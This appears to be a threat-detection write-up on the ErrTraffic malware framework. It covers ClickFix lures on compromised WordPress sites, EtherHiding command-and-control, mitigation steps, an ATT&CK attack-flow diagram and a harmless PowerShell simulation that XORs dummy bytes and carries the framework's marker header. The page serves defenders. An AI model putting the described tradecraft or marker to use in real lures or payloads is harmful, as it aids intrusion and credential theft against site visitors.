Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
ErrTraffic is a malicious JavaScript framework offered through a malware-as-a-service model. It is mainly injected into compromised WordPress websites to deliver ClickFix-style social engineering pages and follow-on malware payloads. The framework also uses the EtherHiding technique to discover command-and-control infrastructure through blockchain smart contracts.
Investigation
Sekoia TDR researchers identified two separate activity clusters, referred to as the “Analytics” cluster and the “Beer” cluster. Their investigation revealed several deployment paths, including WordPress PHP backdoors, credential-stuffing attacks for initial access, and malvertising campaigns that impersonated AI platforms. Forensic analysis also showed clear differences in coding style, command usage, and infrastructure patterns between the two clusters.
Mitigation
Organizations should enforce strong credential hygiene and multi-factor authentication to reduce the risk of WordPress admin compromise. Regular patching of WordPress plugins is also essential, especially for known flaws such as CVE-2020-25213. Defenders should monitor for suspicious PowerShell behavior and unusual outbound traffic to blockchain RPC services or uncommon top-level domains.
Response
If ErrTraffic indicators are detected, affected web servers should be isolated immediately and all WordPress accounts reviewed for unauthorized administrator access. A full forensic sweep should be conducted to identify hidden MU-plugins and unauthorized PHP files. Potentially exposed credentials should be revoked, and all API keys and administrative secrets should be rotated.
"graph TB %% Class Definitions Section classDef reconnaissance fill:#f9f,stroke:#333,stroke-width:2px classDef execution fill:#ff9,stroke:#333,stroke-width:2px classDef persistence fill:#9f9,stroke:#333,stroke-width:2px classDef command_control fill:#9cf,stroke:#333,stroke-width:2px classDef delivery fill:#f96,stroke:#333,stroke-width:2px %% Reconnaissance and Initial Access Section recon_cred["<b>Technique</b> – <b>T1589.001 Gather Victim Identity Information: Credentials</b><br/>Description: Using stolen administrator credentials to access WordPress sites."] class recon_cred reconnaissance recon_drive_by["<b>Technique</b> – <b>T1189 Drive-by Compromise</b><br/>Description: Employing malvertising to direct users to websites impersonating AI platforms like ChatGPT."] class recon_drive_by reconnaissance %% Execution Section exec_clickfix["<b>Technique</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/>Description: Using ClickFix technique with fake error messages such as BSOD or reCAPTCHA to trick users into executing PowerShell commands."] class exec_clickfix execution %% Persistence and C2 Section pers_webshell["<b>Technique</b> – <b>T1505.003 Server Software Component: Web Shell</b><br/>Description: Deploying PHP backdoors like session-manager.php MU-Plugin or a Responsive Webshell."] class pers_webshell persistence pers_valid_acc["<b>Technique</b> – <b>T1078 Valid Accounts</b><br/>Description: Maintaining access via the compromised WordPress dashboard using legitimate credentials."] class pers_valid_acc persistence c2_etherhiding["<b>Technique</b> – <b>EtherHiding</b><br/>Description: Facilitating communication with C2 infrastructure using blockchain smart contracts as a Dead Drop Resolver."] class c2_etherhiding command_control %% Payload Delivery and Credential Access Section del_ingress["<b>Technique</b> – <b>T1105 Ingress Tool Transfer</b><br/>Description: Using PowerShell to download and extract malicious binaries using 7z."] class del_ingress delivery acc_cred_access["<b>Technique</b> – <b>T1539 Credential Access</b><br/>Description: Malware families exfiltrate stolen credentials, web session cookies, and sensitive WooCommerce data."] class acc_cred_access delivery malware_stealer["<b>Malware</b> – <b>Vidar or Stealc</b><br/>Description: Infostealers used to exfiltrate data to attacker-controlled domains."] class malware_stealer delivery %% Connection Flow recon_cred –>|leads_to| exec_clickfix recon_drive_by –>|leads_to| exec_clickfix exec_clickfix –>|triggers| pers_webshell exec_clickfix –>|triggers| pers_valid_acc pers_webshell –>|facilitates| c2_etherhiding pers_valid_acc –>|facilitates| c2_etherhiding c2_etherhiding –>|commands| del_ingress del_ingress –>|deploys| malware_stealer malware_stealer –>|performs| acc_cred_access "
Attack Flow
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: An attacker has successfully tricked a user into clicking a “Fix” button on a malicious website. This triggers a PowerShell command designed to download and decrypt a payload. To evade simple string-based detection, the script uses XOR decryption. The adversary uses the specific ErrTraffic header
<# Code Verification: 656560395146 #>to bypass certain internal checks or as a marker for their own framework. The script uses[convert]::ToInt32to process the XOR keys and the-bxoroperator to decrypt the payload bytes. -
Regression Test Script:
# Simulation of ErrTraffic ClickFix PowerShell payload decryption routine $header = "<# Code Verification: 656560395146 #>" $encodedPayload = @(10, 20, 30, 40) $key = [convert]::ToInt32("5") Write-Host "Initializing payload decryption..." $decrypted = foreach ($byte in $encodedPayload) { $byte -bxor $key } Write-Host "Decryption complete." -
Cleanup Commands:
# No permanent changes are made by the simulation script. # Simply clear the console. Clear-Host